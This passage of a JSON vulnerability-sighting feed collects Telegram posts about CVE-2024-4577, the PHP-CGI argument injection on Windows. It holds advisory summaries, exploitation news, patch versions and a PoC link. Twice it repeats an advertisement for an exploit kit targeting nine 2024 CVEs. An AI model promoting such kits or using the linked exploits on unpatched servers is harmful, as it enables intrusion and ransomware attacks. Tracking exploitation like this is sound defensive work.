Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "a23e5bb7-cdb9-4a48-80e8-80f6652c2b3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1520", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "1c879b7a-b0a4-4fb3-b910-efe7133e251d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1455", "content": "", "creation_timestamp": "2024-09-17T21:29:51.000000Z"}, {"uuid": "db43182c-4691-47c5-a3ca-813e5935056a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/cybersecs/2854", "content": "[ CVE-2024-4577 - Yet Another PHP RCE: Make PHP-CGI Argument Injection Great Again! ]\n\nNew research by Orange Tsai!\n\nThis is a side story/extra bug while I\u2019m preparing for my Black Hat USA presentation. I believe most of the details have already been covered in the official advisory (should be published soon). Although PHP-CGI has gradually been phased out over time, this vulnerability affects XAMPP for Windows by default, allowing unauthenticated attackers to execute arbitrary code on remote XAMPP servers through specific character sequences.\n\nThis vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:\n\nPHP 8.3 < 8.3.8\nPHP 8.2 < 8.2.20\nPHP 8.1 < 8.1.29\n\nBlog: https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html\n\nPoC: https://github.com/watchtowrlabs/CVE-2024-4577", "creation_timestamp": "2024-06-09T19:52:18.000000Z"}, {"uuid": "d5a2ea2e-088d-42f2-8e8d-df03a3d50e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/CyberSecurityIL/48509", "content": "\u05de\u05e2\u05e8\u05da \u05d4\u05e1\u05d9\u05d9\u05d1\u05e8 \u05d4\u05dc\u05d0\u05d5\u05de\u05d9:  \u05e4\u05e2\u05d9\u05dc\u05d5\u05ea \u05e7\u05d1\u05d5\u05e6\u05ea \u05d4\u05db\u05d5\u05e4\u05e8\u05d4 TellYouThePass\n\n\u05de\u05de\u05d9\u05d3\u05e2 \u05e9\u05e0\u05de\u05e6\u05d0 \u05d1\u05d9\u05d3\u05d9 \u05de\u05e2\u05e8\u05da \u05d4\u05e1\u05d9\u05d9\u05d1\u05e8 \u05d4\u05dc\u05d0\u05d5\u05de\u05d9 \u05e2\u05d5\u05dc\u05d4 \u05db\u05d9 \u05d4\u05d2\u05d5\u05e8\u05de\u05d9\u05dd \u05d4\u05e2\u05d5\u05de\u05d3\u05d9\u05dd \u05de\u05d0\u05d7\u05d5\u05e8\u05d9 \u05d4\u05db\u05d5\u05e4\u05e8\u05d4 \u05d4\u05de\u05d5\u05db\u05e8\u05ea \u05d1\u05e9\u05dd TellYouThePass \u05de\u05e0\u05e6\u05dc\u05d9\u05dd \u05d1\u05e6\u05d5\u05e8\u05d4 \u05de\u05e9\u05de\u05e2\u05d5\u05ea\u05d9\u05ea \u05d0\u05ea \u05e4\u05d2\u05d9\u05e2\u05d5\u05ea CVE-2024-4577 \u05d1\u05e9\u05e8\u05ea\u05d9 PHP \u05e2\u05dc \u05d2\u05d1\u05d9 \u05de\u05e2\u05e8\u05db\u05ea \u05d4\u05e4\u05e2\u05dc\u05d4 Windows.\n\n\u05dc\u05d4\u05ea\u05e8\u05e2\u05d4 \u05d6\u05d5 \u05de\u05e6\u05d5\u05e8\u05e3 \u05e7\u05d5\u05d1\u05e5 \u05de\u05d6\u05d4\u05d9\u05dd, \u05d4\u05e2\u05e9\u05d5\u05d9 \u05dc\u05d0\u05e4\u05e9\u05e8 \u05d6\u05d9\u05d4\u05d5\u05d9 \u05e9\u05dc \u05e4\u05e2\u05d9\u05dc\u05d5\u05ea \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4. \u05de\u05d5\u05de\u05dc\u05e5 \u05dc\u05e0\u05d8\u05e8\u05dd \u05d1\u05db\u05dc \u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05d4\u05d0\u05d1\u05d8\u05d7\u05d4 \u05d4\u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05d5\u05ea \u05d4\u05e8\u05dc\u05d5\u05d5\u05e0\u05d8\u05d9\u05d5\u05ea.\n\nhttps://t.me/CyberSecurityIL/5367 \n\n#\u05de\u05e2\u05e8\u05da_\u05d4\u05e1\u05d9\u05d9\u05d1\u05e8_\u05d4\u05dc\u05d0\u05d5\u05de\u05d9", "creation_timestamp": "2024-07-01T14:12:49.000000Z"}, {"uuid": "cd2475fb-7568-4d9c-a1c3-a5acdf34adba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/true_secator/6828", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 GreyNoise \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 PHP, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0435\u0439 \u043a RCE \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445.\n\nCVE-2024-4577 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS 9,8) \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Windows, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 Apache \u0438 PHP-CGI, \u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u0434\u043e\u0432\u044b\u0445 \u0441\u0442\u0440\u0430\u043d\u0438\u0446, \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f PHP \u0432 Windows \u043d\u0435 \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u00ab\u043d\u0430\u0438\u043b\u0443\u0447\u0448\u0435\u0433\u043e \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u044f\u00bb, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 Unicode \u0432 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0431\u043b\u0438\u0437\u043a\u0438\u0435 \u043f\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044e \u0441\u0438\u043c\u0432\u043e\u043b\u044b ANSI, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0431\u0443\u0434\u0443\u0442 \u043d\u0435\u0432\u0435\u0440\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u043c\u043e\u0434\u0443\u043b\u0435\u043c php-cgi \u043a\u0430\u043a \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b PHP.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0432 \u0438\u044e\u043d\u0435 2024 \u0433\u043e\u0434\u0430, \u0430 \u043f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f\u043c, \u0431\u044b\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u0441\u0435\u0433\u043e \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f.\n\n\u041d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Cisco \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2025 \u0433\u043e\u0434\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0441\u0444\u0435\u0440\u0435 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0440\u0430\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0439, \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0430\u0442\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u043c\u0435\u043d\u044f\u044e\u0442 \u043a\u043b\u044e\u0447\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 \u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044e\u0442 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u0434\u043b\u044f \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0441\u0442\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u0432 Cobalt Strike TaoWu.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, GreyNoise \u043a\u043e\u043d\u0441\u0442\u0430\u0442\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f CVE-2024-4577 \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u042f\u043f\u043e\u043d\u0438\u0435\u0439. \n\n\u0424\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438, \u0437\u0430\u043c\u0435\u0442\u043d\u044b\u0435 \u0432\u0441\u043f\u043b\u0435\u0441\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438\u0441\u044c \u0432 \u0421\u0428\u0410, \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u0438, \u0421\u0438\u043d\u0433\u0430\u043f\u0443\u0440\u0435, \u0418\u043d\u0434\u043e\u043d\u0435\u0437\u0438\u0438, \u0422\u0430\u0439\u0432\u0430\u043d\u0435, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435, \u0418\u043d\u0434\u0438\u0438, \u0418\u0441\u043f\u0430\u043d\u0438\u0438 \u0438 \u041c\u0430\u043b\u0430\u0439\u0437\u0438\u0438.\n\n\u041f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0441\u0432\u043e\u0435\u0439 \u0441\u0435\u0442\u0438 \u0445\u0430\u043d\u0438\u043f\u043e\u0442\u043e\u0432 GOG \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u044f\u043d\u0432\u0430\u0440\u0435 2025 \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 1089 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u043f\u044b\u0442\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c CVE-2024-4577, \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e 79 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\n\u0417\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043c\u0435\u0441\u044f\u0446 \u0431\u043e\u043b\u0435\u0435 43% IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 CVE-2024-4577, \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438\u0441\u044c \u0432 \u0413\u0435\u0440\u043c\u0430\u043d\u0438\u0438 \u0438 \u041a\u0438\u0442\u0430\u044f, \u0430 GreyNoise \u0432 \u0444\u0435\u0432\u0440\u0430\u043b\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u0440\u043e\u0441\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443, \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0430\u0446\u0438\u044e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0446\u0435\u043b\u0435\u0439.\n\nCVE-2024-4577 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 PHP \u043d\u0430 Windows \u0438 \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 PHP 8.1.29, 8.2.20 \u0438 8.3.8. \n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435.", "creation_timestamp": "2025-03-11T15:36:40.000000Z"}, {"uuid": "cfff426e-1514-4ec2-95c3-5bab61ee1d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/5833", "content": "DEVCORE \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 PHP, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Windows.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430 \u043d\u0430 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PHP-CGI.\n\n\u0424\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u043f\u0430\u0442\u0447\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 2012 \u0433\u043e\u0434\u0430 \u0434\u043b\u044f CVE-2012-1823, \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0435\u0439 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0432 \u0445\u043e\u0434\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 PHP-CGI \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0441\u0442\u0440\u043e\u043a\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0430.\n\n\u041f\u0440\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 PHP \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043d\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438 Best-Fit \u0432 \u041e\u0421 Windows, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u043e \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0431\u043e\u0439\u0442\u0438 \u0437\u0430\u0449\u0438\u0442\u0443\u00a0\u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0435\u0439 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \n\n\n\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 PHP \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u0442\u0430\u043a\u0438 \u043f\u0443\u0442\u0435\u043c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u043a\u043e\u0432 PHP \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0438 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 7 \u043c\u0430\u044f, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043e\u043d\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0440\u0435\u0448\u0438\u0442\u044c \u043a 6 \u0438\u044e\u043d\u044f, \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438\u00a08.3.8\u00a0,\u00a08.2.20\u00a0\u0438\u00a08.1.29.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u043b\u0438 \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Watchtowr, \u043e\u0442\u043c\u0435\u0442\u0438\u0432 \u0435\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0441 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c, \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u044f\u0449\u0443\u044e \u0434\u043b\u044f \u043f\u044f\u0442\u043d\u0438\u0447\u043d\u043e\u0433\u043e \u0432\u0435\u0447\u0435\u0440\u0430.", "creation_timestamp": "2024-06-07T16:30:05.000000Z"}, {"uuid": "285fd5c8-d42a-407e-8d99-9f5cf3a5dc51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/ctinow/218452", "content": "Attacker Probing for New PHP Vulnerablity CVE-2024-4577, (Sun, Jun 9th)\nhttps://ift.tt/p079NMw", "creation_timestamp": "2024-06-09T23:24:41.000000Z"}, {"uuid": "bde74d3c-0ed1-4068-8417-59b84e3b445f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/true_secator/5960", "content": "\u0421\u043b\u0435\u0434\u0443\u044f \u0432\u044b\u0448\u0435\u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0443\u043c\u043e\u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f\u043c \u0413\u0440\u0438\u0431\u043e\u0432, \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b \u043f\u0440\u043e\u0448\u0435\u0440\u0441\u0442\u0438\u043b\u0438 